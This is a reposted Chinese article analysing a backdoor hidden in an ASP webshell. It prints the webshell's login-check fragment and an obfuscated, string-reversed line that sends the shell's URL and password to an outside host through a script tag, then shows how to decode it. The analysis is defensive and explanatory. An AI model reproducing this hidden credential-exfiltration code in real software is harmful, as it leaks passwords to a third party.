鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 加密解密 > >

webshell后门分析第二篇

来源:互联网 作者:佚名 时间:2015-04-12 10:25
看到这篇先看第一篇:http://www.2cto.com/Article/201306/219719.html 今晚又有学员发来一只马 现在asp的马 基本都是同一只马修改出来的 检测原理大致相同。 如图:这只马大家都有:我就不发了 技术好点的 肯定将后门加密才发出来。 今天这只又没有加密 按照
看到这篇先看第一篇:http://www.2cto.com/Article/201306/219719.html

             今晚又有学员发来一只马 现在asp的马 基本都是同一只马修改出来的 检测原理大致相同。
如图:这只马大家都有:我就不发了
技术好点的 肯定将后门加密才发出来。
             今天这只又没有加密
             按照上次的检测流程 找到 上次的地方 看了一下没有问题。
1 if session("KKK")<>UserPass then
2 if request.form("pass")<>"" then
3 if request.form("pass")=UserPass then
4 session("KKK")=UserPass
5 if instr(url,lcase("lpt"))<0 then
6 response.redirect url
7 else
这次估计是像以前的老方法收信。<【本文来自鸿网互联 (http://www.68idc.cn)】/div>
比较好找现在webshell的后门内基本都是把密码的字段 传入来进行判断。
所以只要跟踪UserPass 基本都能找到收信的网址:
很多的时候都需要字符串
1 acodee="=u?/moc.81sid.d//:ptth'=crs tpircs<":Efun=StrReverse(acodee):Efun=Efun&uu&"&p="&userpass&"'></script>
StrReverse 这个是字符串反串的意思 新建一个asp文件 输出看看就行了
1 <%
2 acodee="=u?/moc.81sid.d//:ptth'=crs tpircs<":Efun=StrReverse(acodee):
3 Response.Write(Efun):
4 %>
 
u是传进来的密码
很简单吧 。。。。。。。。。。。。。。。。。。。。。。。。。。。
 
网友评论
<